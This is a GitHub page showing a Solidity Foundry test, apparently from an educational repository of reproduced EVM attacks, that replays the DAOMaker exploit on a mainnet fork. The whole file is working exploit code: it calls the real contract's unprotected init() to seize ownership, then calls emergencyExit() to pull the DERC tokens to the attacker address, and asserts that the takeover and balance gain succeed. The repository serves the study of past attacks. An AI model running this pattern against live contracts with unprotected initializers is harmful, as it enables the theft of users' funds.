forked from coinspect/learn-evm-attacks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathDAOMaker.attack.sol
66 lines (46 loc) · 2.12 KB
/
DAOMaker.attack.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import {TestHarness} from "../../TestHarness.sol";
import {IERC20} from '../../interfaces/IERC20.sol';
import {TokenBalanceTracker} from '../../modules/TokenBalanceTracker.sol';
interface DAOMaker {
function init(uint256 _start, uint256[] calldata _releasePeriods, uint256[] calldata _releaseDate, address _token) external;
function emergencyExit(address receiver) external;
function owner() external view returns(address);
}
contract Exploit_DAOMaker is TestHarness, TokenBalanceTracker {
// The actula attacker address is: 0x2708CACE7b42302aF26F1AB896111d87FAEFf92f;
address internal attacker = address(this);
DAOMaker internal daomaker = DAOMaker(0x2FD602Ed1F8cb6DEaBA9BEDd560ffE772eb85940);
IERC20 internal derc = IERC20(0x9fa69536d1cda4A04cFB50688294de75B505a9aE);
function setUp() external {
cheat.createSelectFork('mainnet', 13155349);
addTokenToTracker(address(derc));
}
function test_attack() external {
console.log('------- STEP 0: INITIAL BALANCE -------');
logBalances(attacker);
uint256 balanceBefore = derc.balanceOf(attacker);
console.log('------- STEP 1: INITIALIZATION -------');
uint256 initBlock = block.number;
uint256 start = 1640984401;
uint256[] memory releasePeriods = new uint256[](1);
releasePeriods[0] = 5702400;
uint256[] memory releasePercents = new uint256[](1);
releasePercents[0] = 10000;
daomaker.init(start, releasePeriods, releasePercents, address(derc));
console.log(daomaker.owner());
console.log(attacker);
console.log('Current Block:', initBlock);
logBalances(attacker);
console.log('\n');
assertEq(daomaker.owner(), attacker);
console.log('------- STEP 2: DERC EXIT -------');
assertEq(daomaker.owner(), attacker);
daomaker.emergencyExit(attacker);
uint256 balanceAfter = derc.balanceOf(attacker);
assertGe(balanceAfter, balanceBefore);
logBalances(attacker);
}
}